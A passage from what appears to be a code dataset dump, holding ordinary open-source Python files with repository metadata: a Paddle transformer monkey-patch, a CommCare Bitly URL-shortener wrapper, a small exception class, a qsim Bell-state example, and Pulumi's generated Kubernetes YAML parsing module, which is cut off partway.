float(self.num_heads) / self.q_proj.fn.cur_config['expand_ratio'])
return out if len(outs) == 1 else tuple(outs)
### monkey patch for TransformerEncoder forward to accept head_mask
### attn_mask[0] = attn_mask, attn_mask[1] = head_mask
def _encoder_forward(self, src, src_mask=[None, None]):
output = src
if src_mask[1] is not None:
head_mask = src_mask[1]
if len(head_mask.shape) == 1:
head_mask = paddle.unsqueeze(
paddle.unsqueeze(
paddle.unsqueeze(paddle.unsqueeze(head_mask, 0), 0), -1),
-1)
head_mask = paddle.expand(
head_mask, shape=[self.num_layers] + head_mask.shape[1:])
elif len(head_mask.shape) == 2:
head_mask = paddle.unsqueeze(
paddle.unsqueeze(paddle.unsqueeze(head_mask, 1), -1), -1)
else:
head_mask = [None] * self.num_layers
for i, mod in enumerate(self.layers):
output = mod(output, src_mask=[src_mask[0], head_mask[i]])
if self.norm is not None:
output = self.norm(output)
return output
def _encoder_layer_forward(self, src, src_mask=None, cache=None):
residual = src
if self.normalize_before:
src = self.norm1(src)
# Add cache for encoder for the usage like UniLM
if cache is None:
src = self.self_attn(src, src, src, src_mask)
else:
src, incremental_cache = self.self_attn(src, src, src, src_mask, cache)
src = residual + self.dropout1(src)
if not self.normalize_before:
src = self.norm1(src)
residual = src
if self.normalize_before:
src = self.norm2(src)
src = self.linear2(self.dropout(self.activation(self.linear1(src))))
src = residual + self.dropout2(src)
if not self.normalize_before:
src = self.norm2(src)
return src if cache is None else (src, incremental_cache)
paddle.nn.MultiHeadAttention.forward = _mha_forward
paddle.nn.MultiHeadAttention._prepare_qkv = _prepare_qkv
paddle.nn.TransformerEncoder.forward = _encoder_forward
paddle.nn.TransformerEncoderLayer.forward = _encoder_layer_forward
|
d50aafb71c102198bd604c1b73139093c3feb9fa
|
578db86c51d44ebddd0dc7b1738985b3dc69eb74
|
/corehq/util/bitly.py
|
77cd18a9b56380eb87dfce61dbddb524d8293a11
|
[
"BSD-3-Clause"
] |
permissive
|
dimagi/commcare-hq
|
a43c7dd32b5f89c89fd5aa1b1359ab7301f4ff6b
|
e7391ddae1af1dbf118211ecb52c83fc508aa656
|
refs/heads/master
| 2023-08-16T22:38:27.853437
| 2023-08-16T19:07:19
| 2023-08-16T19:07:19
| 247,278
| 499
| 203
|
BSD-3-Clause
| 2023-09-14T19:03:24
| 2009-07-09T17:00:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,776
|
py
|
bitly.py
|
import json
import warnings
from functools import partial
from django.conf import settings
import requests
from requests import HTTPError
from six.moves.urllib.request import urlopen
BITLY_CONFIGURED = False
class BitlyError(Exception):
def __init__(self, status_code, status_txt):
self.status_code = status_code
self.status_txt = status_txt
def __str__(self):
return "Bitly Error %s: %s" % (self.status_code, self.status_txt)
def shorten_v3(url, login, api_key):
response = json.load(
urlopen("http://api.bit.ly/v3/shorten?login=%s&apiKey=%s&longUrl=%s" % (login, api_key, url))
)
if not response['data']:
raise BitlyError(response['status_code'], response['status_txt'])
return response['data']['url']
def shorten_v4(url, oauth_token):
response = requests.post("https://api-ssl.bitly.com/v4/shorten", json={"long_url": url}, headers={
'Authorization': f'Bearer {oauth_token}',
'Content-Type': 'application/json'
})
data = response.json()
try:
response.raise_for_status()
except HTTPError:
raise BitlyError(response.status_code, data.get('description', 'unknown'))
return data['link']
if getattr(settings, 'BITLY_OAUTH_TOKEN', None):
shorten = partial(shorten_v4, oauth_token=settings.BITLY_OAUTH_TOKEN)
BITLY_CONFIGURED = True
elif getattr(settings, 'BITLY_LOGIN', None) and getattr(settings, 'BITLY_APIKEY', None):
warnings.warn(
"V3 Bitly API in use. Please upgrade to V4 by setting 'BITLY_OAUTH_TOKEN' in settings",
DeprecationWarning
)
shorten = partial(shorten_v3, login=settings.BITLY_LOGIN, api_key=settings.BITLY_APIKEY)
BITLY_CONFIGURED = True
else:
def shorten(url):
return url
|
a2494cd31fdb5a1a59b6a67bdc3adf3d6b0d910b
|
2f1e3f24f2798507c9eb73185a955c9bfb735140
|
/libreco/utils/exception.py
|
c54c333d648b7f8ba6805455085014e862f3dcc6
|
[
"MIT"
] |
permissive
|
massquantity/LibRecommender
|
e4f55b06b2208c794a3f97f7ff89413fa9beaffa
|
8d5fbe9c177f5b91c2b6f19a155a83320dd0e20c
|
refs/heads/master
| 2023-08-31T23:48:37.634663
| 2023-08-20T11:58:15
| 2023-08-20T11:58:15
| 174,493,761
| 251
| 55
|
MIT
| 2023-08-20T11:58:16
| 2019-03-08T07:58:27
|
Python
|
UTF-8
|
Python
| false
| false
| 319
|
py
|
exception.py
|
class NotSamplingError(Exception):
"""Exception related to sampling data
If client wants to use batch_sampling and then evaluation on the dataset,
but forgot to do whole data sampling beforehand, this exception will be
raised. Because in this case, unsampled data can't be evaluated.
"""
pass
|
fe4d00190f5949043a51b714149f4deb21a2c24e
|
3138dfcf72a0f2e5b9b4bd04ee3740b55f3a0141
|
/docs/tutorials/multinode/noiseless3.py
|
f35dcb5c383ac2c920779254b061dd347310f1c8
|
[
"Apache-2.0"
] |
permissive
|
quantumlib/qsim
|
040c218ea6736e6724e0ac75e38a691862834bd5
|
235ae2fc039fb4a98beb4a6114d10c7f8d2070f7
|
refs/heads/master
| 2023-09-04T11:03:09.833512
| 2023-06-01T18:07:08
| 2023-06-01T18:07:08
| 236,547,448
| 367
| 137
|
Apache-2.0
| 2023-08-20T02:42:50
| 2020-01-27T17:19:36
|
C++
|
UTF-8
|
Python
| false
| false
| 396
|
py
|
noiseless3.py
|
import cirq, qsimcirq
# Create a Bell state, |00) + |11)
q0, q1 = cirq.LineQubit.range(2)
circuit = cirq.Circuit(cirq.H(q0), cirq.CNOT(q0, q1), cirq.measure(q0, q1, key="m"))
sim = qsimcirq.QSimSimulator()
result = sim.run(circuit, repetitions=1000)
# Outputs a histogram dict of result:count pairs.
# Expected result is a bunch of 0s and 3s, with no 1s or 2s.
print(result.histogram(key="m"))
|
4e6b49159b908e5f8c31cba54cb608517a44e848
|
2f4605e878c073d7f735eed1d675c2ee454ad68e
|
/sdk/python/pulumi_kubernetes/yaml/yaml.py
|
cdaf951f57f06125dab2a226b26cf50ca896461f
|
[
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-kubernetes
|
3c0c82e03a19f4077625d2ff6dae5ea4dbf90243
|
b5d76f0731383f39903f35a6c1566f2f4344c944
|
refs/heads/master
| 2023-08-17T16:57:11.845935
| 2023-08-16T00:55:18
| 2023-08-16T00:55:18
| 116,869,354
| 353
| 128
|
Apache-2.0
| 2023-09-13T21:42:01
| 2018-01-09T20:50:33
|
Java
|
UTF-8
|
Python
| false
| false
| 102,331
|
py
|
yaml.py
|
# *** WARNING: this file was generated by the Pulumi Kubernetes codegen tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
from copy import copy
from glob import glob
from inspect import getfullargspec, ismethod
from typing import Any, Callable, List, Mapping, Optional, Sequence
import pulumi
import pulumi.runtime
import requests
from pulumi_kubernetes.apiextensions import CustomResource
from .. import _utilities, _tables
__all__ = ['ConfigFile', 'ConfigGroup']
class ConfigGroup(pulumi.ComponentResource):
resources: pulumi.Output[dict]
"""
Kubernetes resources contained in this ConfigGroup.
"""
def __init__(self,
name: str,
files: Optional[Sequence[str]] = None,
yaml: Optional[Sequence[str]] = None,
opts: Optional[pulumi.ResourceOptions] = None,
transformations: Optional[Sequence[Callable[[Any, pulumi.ResourceOptions], None]]] = None,
resource_prefix: Optional[str] = None,
skip_await: Optional[bool] = None):
"""
ConfigGroup creates a set of Kubernetes resources from Kubernetes YAML text. The YAML text
may be supplied using any of the following methods:
1. Using a filename or a list of filenames:
2. Using a file pattern or a list of file patterns:
3. Using a literal string containing YAML, or a list of such strings:
4. Any combination of files, patterns, or YAML strings:
## Example Usage
### Local File
```python
from pulumi_kubernetes.yaml import ConfigGroup
example = ConfigGroup(
"example",
files=["foo.yaml"],
)
```
### Multiple Local File
```python
from pulumi_kubernetes.yaml import ConfigGroup
example = ConfigGroup(
"example",
files=["foo.yaml", "bar.yaml"],
)
```
### Local File Pattern
```python
from pulumi_kubernetes.yaml import ConfigGroup
example = ConfigGroup(
"example",
files=["yaml/*.yaml"],
)
```
### Multiple Local File Patterns
```python
from pulumi_kubernetes.yaml import ConfigGroup
example = ConfigGroup(
"example",
files=["foo/*.yaml", "bar/*.yaml"],
)
```
### Literal YAML String
```python
from pulumi_kubernetes.yaml import ConfigGroup
example = ConfigGroup(
"example",
yaml=['''
apiVersion: v1
kind: Namespace
metadata:
name: foo
''']
)
```
### YAML with Transformations
```python
from pulumi_kubernetes.yaml import ConfigGroup
# Make every service private to the cluster, i.e., turn all services into ClusterIP instead of LoadBalancer.
def make_service_private(obj, opts):
if obj["kind"] == "Service" and obj["apiVersion"] == "v1":
try:
t = obj["spec"]["type"]
if t == "LoadBalancer":
obj["spec"]["type"] = "ClusterIP"
except KeyError:
pass
# Set a resource alias for a previous name.
def alias(obj, opts):
if obj["kind"] == "Deployment":
opts.aliases = ["oldName"]
# Omit a resource from the Chart by transforming the specified resource definition to an empty List.
def omit_resource(obj, opts):
if obj["kind"] == "Pod" and obj["metadata"]["name"] == "test":
obj["apiVersion"] = "v1"
obj["kind"] = "List"
example = ConfigGroup(
"example",
files=["foo.yaml"],
transformations=[make_service_private, alias, omit_resource],
)
```
:param str name: A name for a resource.
:param Optional[Sequence[str]] files: Set of paths or a URLs that uniquely identify files.
:param Optional[Sequence[str]] yaml: YAML text containing Kubernetes resource definitions.
:param Optional[pulumi.ResourceOptions] opts: A bag of optional settings that control a resource's behavior.
:param Optional[Sequence[Callable[[Any, pulumi.ResourceOptions], None]]] transformations: A set of
transformations to apply to Kubernetes resource definitions before registering with engine.
:param Optional[str] resource_prefix: An optional prefix for the auto-generated resource names.
Example: A resource created with resource_prefix="foo" would produce a resource named "foo-resourceName".
:param Optional[bool] skip_await: Skip await logic for all resources in this YAML. Resources will be marked
ready as soon as they are created. Warning: This option should not be used if you have resources
depending on Outputs from the YAML.
"""
if not name:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(name, str):
raise TypeError('Expected resource name to be a string')
if opts and not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if not files:
files = []
if not yaml:
yaml = []
__props__ = dict()
if resource_prefix:
name = f"{resource_prefix}-{name}"
super(ConfigGroup, self).__init__(
"kubernetes:yaml:ConfigGroup",
name,
__props__,
opts)
self.resources = pulumi.Output.from_input({})
transformations = transformations if transformations is not None else []
if skip_await:
transformations.append(_skip_await)
_files: List[str] = []
for file in files:
if _is_url(file):
_files.append(file)
else:
_files += [f for f in glob(file)]
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(parent=self))
for file in _files:
cf = ConfigFile(
file, file_id=file, transformations=transformations, resource_prefix=resource_prefix, opts=opts)
# Add any new ConfigFile resources to the ConfigGroup's resources
self.resources = pulumi.Output.all(cf.resources, self.resources).apply(lambda x: {**x[0], **x[1]})
for text in yaml:
# Rather than using the default provider for the following invoke call, use the version specified
# in package.json.
invoke_opts = pulumi.InvokeOptions(version=_utilities.get_version(),
provider=opts.provider if opts.provider else None)
__ret__ = invoke_yaml_decode(text, invoke_opts)
resources = _parse_yaml_document(__ret__, opts, transformations, resource_prefix)
# Add any new YAML resources to the ConfigGroup's resources
self.resources = pulumi.Output.all(resources, self.resources).apply(lambda x: {**x[0], **x[1]})
# Note: Unlike NodeJS, Python requires that we "pull" on our futures in order to get them scheduled for
# execution. In order to do this, we leverage the engine's RegisterResourceOutputs to wait for the
# resolution of all resources that this YAML document created.
self.register_outputs({"resources": self.resources})
def translate_output_property(self, prop: str) -> str:
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop: str) -> str:
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
def get_resource(self,
group_version_kind: str,
name: str,
namespace: Optional[str] = None) -> pulumi.Output[pulumi.CustomResource]:
"""
get_resource returns a resource defined by a built-in Kubernetes group/version/kind and
name. For example: `get_resource("apps/v1/Deployment", "nginx")`
:param str group_version_kind: Group/Version/Kind of the resource, e.g., `apps/v1/Deployment`
:param str name: Name of the resource to retrieve
:param Optional[str] namespace: Optional namespace of the resource to retrieve
"""
# `id` will either be `${name}` or `${namespace}/${name}`.
id = pulumi.Output.from_input(name)
if namespace is not None:
id = pulumi.Output.concat(namespace, '/', name)
resource_id = id.apply(lambda x: f'{group_version_kind}:{x}')
return resource_id.apply(lambda x: self.resources[x])
class ConfigFile(pulumi.ComponentResource):
resources: pulumi.Output[dict]
"""
Kubernetes resources contained in this ConfigFile.
"""
def __init__(self,
name: str,
file: Optional[str] = None,
opts: Optional[pulumi.ResourceOptions] = None,
transformations: Optional[Sequence[Callable[[Any, pulumi.ResourceOptions], None]]] = None,
resource_prefix: Optional[str] = None,
file_id: Optional[str] = None,
skip_await: Optional[bool] = None):
"""
ConfigFile creates a set of Kubernetes resources from a Kubernetes YAML file.
## Example Usage
### Local File
```python
from pulumi_kubernetes.yaml import ConfigFile
example = ConfigFile(
"example",
file="foo.yaml",
)
```
### YAML with Transformations
```python
from pulumi_kubernetes.yaml import ConfigFile
# Make every service private to the cluster, i.e., turn all services into ClusterIP instead of LoadBalancer.
def make_service_private(obj, opts):
if obj["kind"] == "Service" and obj["apiVersion"] == "v1":
try:
t = obj["spec"]["type"]
if t == "LoadBalancer":
obj["spec"]["type"] = "ClusterIP"
except KeyError:
pass
# Set a resource alias for a previous name.
def alias(obj, opts):
if obj["kind"] == "Deployment":
opts.aliases = ["oldName"]
# Omit a resource from the Chart by transforming the specified resource definition to an empty List.
def omit_resource(obj, opts):
if obj["kind"] == "Pod" and obj["metadata"]["name"] == "test":
obj["apiVersion"] = "v1"
obj["kind"] = "List"
example = ConfigFile(
"example",
file="foo.yaml",
transformations=[make_service_private, alias, omit_resource],
)
```
:param str name: A name for a resource.
:param Optional[str] file: Path or a URL that uniquely identifies a file.
:param Optional[pulumi.ResourceOptions] opts: A bag of optional settings that control a resource's behavior.
:param Optional[Sequence[Callable[[Any, pulumi.ResourceOptions], None]]] transformations: A set of
transformations to apply to Kubernetes resource definitions before registering with engine.
:param Optional[str] resource_prefix: An optional prefix for the auto-generated resource names.
Example: A resource created with resource_prefix="foo" would produce a resource named "foo-resourceName".
:param Optional[bool] skip_await: Skip await logic for all resources in this YAML. Resources will be marked
ready as soon as they are created. Warning: This option should not be used if you have resources
depending on Outputs from the YAML.
"""
if not name:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(name, str):
raise TypeError('Expected resource name to be a string')
if opts and not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
if resource_prefix:
name = f"{resource_prefix}-{name}"
super(ConfigFile, self).__init__(
"kubernetes:yaml:ConfigFile",
name,
__props__,
opts)
if file_id is not None:
warnings.warn("explicit use of file_id is deprecated, use 'file' instead", DeprecationWarning)
file = file_id
if file is None:
raise TypeError("Missing file argument")
if _is_url(file):
text = _read_url(file)
else:
text = _read_file(file)
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(parent=self))
transformations = transformations if transformations is not None else []
if skip_await:
transformations.append(_skip_await)
# Rather than using the default provider for the following invoke call, use the version specified
# in package.json.
invoke_opts = pulumi.InvokeOptions(version=_utilities.get_version(),
provider=opts.provider if opts.provider else None)
__ret__ = invoke_yaml_decode(text, invoke_opts)
# Note: Unlike NodeJS, Python requires that we "pull" on our futures in order to get them scheduled for
# execution. In order to do this, we leverage the engine's RegisterResourceOutputs to wait for the
# resolution of all resources that this YAML document created.
self.resources = _parse_yaml_document(__ret__, opts, transformations, resource_prefix)
self.register_outputs({"resources": self.resources})
def translate_output_property(self, prop: str) -> str:
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop: str) -> str:
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
def get_resource(self,
group_version_kind: str,
name: str,
namespace: Optional[str] = None) -> pulumi.Output[pulumi.CustomResource]:
"""
get_resource returns a resource defined by a built-in Kubernetes group/version/kind and
name. For example: `get_resource("apps/v1/Deployment", "nginx")`
:param str group_version_kind: Group/Version/Kind of the resource, e.g., `apps/v1/Deployment`
:param str name: Name of the resource to retrieve
:param Optional[str] namespace: Optional namespace of the resource to retrieve
"""
# `id` will either be `${name}` or `${namespace}/${name}`.
id = pulumi.Output.from_input(name)
if namespace is not None:
id = pulumi.Output.concat(namespace, '/', name)
resource_id = id.apply(lambda x: f'{group_version_kind}:{x}')
return resource_id.apply(lambda x: self.resources[x])
# Add skipAwait annotation to all resources.
def _skip_await(obj, opts):
if obj["metadata"].get("annotations") is None:
obj["metadata"]["annotations"] = {"pulumi.com/skipAwait": "true"}
else:
obj["metadata"]["annotations"]["pulumi.com/skipAwait"] = "true"
def _is_url(url: str) -> bool:
return url.startswith('http://') or url.startswith('https://')
def _read_url(url: str) -> str:
response = requests.get(url)
response.raise_for_status()
return response.text
def _read_file(path: str) -> str:
with open(path, 'r') as file:
data = file.read()
return data
def _build_resources_dict(objs: Sequence[pulumi.Output]) -> Mapping[pulumi.Output, pulumi.Output]:
return {key: value for key, value in objs}
def _parse_yaml_document(
objects, opts: Optional[pulumi.ResourceOptions] = None,
transformations: Optional[Sequence[Callable]] = None,
resource_prefix: Optional[str] = None
) -> pulumi.Output:
objs = []
for obj in objects:
file_objects = _parse_yaml_object(obj, opts, transformations, resource_prefix)
for file_object in file_objects:
objs.append(file_object)
return pulumi.Output.all(*objs).apply(_build_resources_dict)
def _parse_yaml_object(
obj, opts: Optional[pulumi.ResourceOptions] = None,
transformations: Optional[Sequence[Callable]] = None,
resource_prefix: Optional[str] = None
) -> [pulumi.Output]:
"""
_parse_yaml_object parses a YAML manifest object, and creates the specified resources.
"""
if not obj:
return []
# Create a copy of opts to pass into potentially mutating transforms that will be applied to this resource.
if opts is not None:
opts = copy(opts)
else:
opts = {}
# Allow users to change API objects before any validation.
if transformations is not None:
for t in transformations:
if len(getfullargspec(t)[0]) == (2 if not ismethod(t) else 3):
t(obj, opts)
else:
t(obj)
if "kind" not in obj or "apiVersion" not in obj:
raise Exception("Kubernetes resources require a kind and apiVersion: {}".format(json.dumps(obj)))
api_version = obj["apiVersion"]
kind = obj["kind"]
# Don't pass these items as kwargs to the resource classes.
del obj['apiVersion']
del obj['kind']
if kind.endswith("List"):
objs = []
if "items" in obj:
for item in obj["items"]:
objs += _parse_yaml_object(item, opts, transformations, resource_prefix)
return objs
if "metadata" not in obj or "name" not in obj["metadata"]:
raise Exception("YAML object does not have a .metadata.name: {}/{} {}".format(
api_version, kind, json.dumps(obj)))
# Convert obj keys to Python casing
for key in list(obj.keys()):
new_key = _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(key) or key
if new_key != key:
obj[new_key] = obj.pop(key)
metadata = obj["metadata"]
spec = obj.get("spec")
identifier: pulumi.Output = pulumi.Output.from_input(metadata["name"])
if "namespace" in metadata:
identifier = pulumi.Output.all(metadata["namespace"], metadata["name"]).apply(
lambda x: f"{x[0]}/{x[1]}")
if resource_prefix:
identifier = pulumi.Output.from_input(identifier).apply(
lambda identifier: f"{resource_prefix}-{identifier}")
gvk = f"{api_version}/{kind}"
if gvk == "admissionregistration.k8s.io/v1/MutatingWebhookConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1 import MutatingWebhookConfiguration
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1/MutatingWebhookConfiguration:{x}",
MutatingWebhookConfiguration(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1/MutatingWebhookConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1 import MutatingWebhookConfigurationList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1/MutatingWebhookConfigurationList:{x}",
MutatingWebhookConfigurationList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1/ValidatingWebhookConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1 import ValidatingWebhookConfiguration
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1/ValidatingWebhookConfiguration:{x}",
ValidatingWebhookConfiguration(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1/ValidatingWebhookConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1 import ValidatingWebhookConfigurationList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1/ValidatingWebhookConfigurationList:{x}",
ValidatingWebhookConfigurationList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicy":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1alpha1 import ValidatingAdmissionPolicy
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicy:{x}",
ValidatingAdmissionPolicy(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicyBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1alpha1 import ValidatingAdmissionPolicyBinding
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicyBinding:{x}",
ValidatingAdmissionPolicyBinding(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicyBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1alpha1 import ValidatingAdmissionPolicyBindingList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicyBindingList:{x}",
ValidatingAdmissionPolicyBindingList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicyList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1alpha1 import ValidatingAdmissionPolicyList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1alpha1/ValidatingAdmissionPolicyList:{x}",
ValidatingAdmissionPolicyList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/MutatingWebhookConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import MutatingWebhookConfiguration
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/MutatingWebhookConfiguration:{x}",
MutatingWebhookConfiguration(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/MutatingWebhookConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import MutatingWebhookConfigurationList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/MutatingWebhookConfigurationList:{x}",
MutatingWebhookConfigurationList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicy":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import ValidatingAdmissionPolicy
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicy:{x}",
ValidatingAdmissionPolicy(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicyBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import ValidatingAdmissionPolicyBinding
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicyBinding:{x}",
ValidatingAdmissionPolicyBinding(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicyBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import ValidatingAdmissionPolicyBindingList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicyBindingList:{x}",
ValidatingAdmissionPolicyBindingList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicyList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import ValidatingAdmissionPolicyList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/ValidatingAdmissionPolicyList:{x}",
ValidatingAdmissionPolicyList(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/ValidatingWebhookConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import ValidatingWebhookConfiguration
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/ValidatingWebhookConfiguration:{x}",
ValidatingWebhookConfiguration(f"{x}", opts, **obj)))]
if gvk == "admissionregistration.k8s.io/v1beta1/ValidatingWebhookConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.admissionregistration.v1beta1 import ValidatingWebhookConfigurationList
return [identifier.apply(
lambda x: (f"admissionregistration.k8s.io/v1beta1/ValidatingWebhookConfigurationList:{x}",
ValidatingWebhookConfigurationList(f"{x}", opts, **obj)))]
if gvk == "apiextensions.k8s.io/v1/CustomResourceDefinitionList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiextensions.v1 import CustomResourceDefinitionList
return [identifier.apply(
lambda x: (f"apiextensions.k8s.io/v1/CustomResourceDefinitionList:{x}",
CustomResourceDefinitionList(f"{x}", opts, **obj)))]
if gvk == "apiextensions.k8s.io/v1beta1/CustomResourceDefinitionList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiextensions.v1beta1 import CustomResourceDefinitionList
return [identifier.apply(
lambda x: (f"apiextensions.k8s.io/v1beta1/CustomResourceDefinitionList:{x}",
CustomResourceDefinitionList(f"{x}", opts, **obj)))]
if gvk == "apiregistration.k8s.io/v1/APIService":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiregistration.v1 import APIService
return [identifier.apply(
lambda x: (f"apiregistration.k8s.io/v1/APIService:{x}",
APIService(f"{x}", opts, **obj)))]
if gvk == "apiregistration.k8s.io/v1/APIServiceList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiregistration.v1 import APIServiceList
return [identifier.apply(
lambda x: (f"apiregistration.k8s.io/v1/APIServiceList:{x}",
APIServiceList(f"{x}", opts, **obj)))]
if gvk == "apiregistration.k8s.io/v1beta1/APIService":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiregistration.v1beta1 import APIService
return [identifier.apply(
lambda x: (f"apiregistration.k8s.io/v1beta1/APIService:{x}",
APIService(f"{x}", opts, **obj)))]
if gvk == "apiregistration.k8s.io/v1beta1/APIServiceList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiregistration.v1beta1 import APIServiceList
return [identifier.apply(
lambda x: (f"apiregistration.k8s.io/v1beta1/APIServiceList:{x}",
APIServiceList(f"{x}", opts, **obj)))]
if gvk == "apps/v1/ControllerRevision":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import ControllerRevision
return [identifier.apply(
lambda x: (f"apps/v1/ControllerRevision:{x}",
ControllerRevision(f"{x}", opts, **obj)))]
if gvk == "apps/v1/ControllerRevisionList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import ControllerRevisionList
return [identifier.apply(
lambda x: (f"apps/v1/ControllerRevisionList:{x}",
ControllerRevisionList(f"{x}", opts, **obj)))]
if gvk == "apps/v1/DaemonSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import DaemonSet
return [identifier.apply(
lambda x: (f"apps/v1/DaemonSet:{x}",
DaemonSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1/DaemonSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import DaemonSetList
return [identifier.apply(
lambda x: (f"apps/v1/DaemonSetList:{x}",
DaemonSetList(f"{x}", opts, **obj)))]
if gvk == "apps/v1/Deployment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import Deployment
return [identifier.apply(
lambda x: (f"apps/v1/Deployment:{x}",
Deployment(f"{x}", opts, **obj)))]
if gvk == "apps/v1/DeploymentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import DeploymentList
return [identifier.apply(
lambda x: (f"apps/v1/DeploymentList:{x}",
DeploymentList(f"{x}", opts, **obj)))]
if gvk == "apps/v1/ReplicaSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import ReplicaSet
return [identifier.apply(
lambda x: (f"apps/v1/ReplicaSet:{x}",
ReplicaSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1/ReplicaSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import ReplicaSetList
return [identifier.apply(
lambda x: (f"apps/v1/ReplicaSetList:{x}",
ReplicaSetList(f"{x}", opts, **obj)))]
if gvk == "apps/v1/StatefulSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import StatefulSet
return [identifier.apply(
lambda x: (f"apps/v1/StatefulSet:{x}",
StatefulSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1/StatefulSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1 import StatefulSetList
return [identifier.apply(
lambda x: (f"apps/v1/StatefulSetList:{x}",
StatefulSetList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta1/ControllerRevision":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta1 import ControllerRevision
return [identifier.apply(
lambda x: (f"apps/v1beta1/ControllerRevision:{x}",
ControllerRevision(f"{x}", opts, **obj)))]
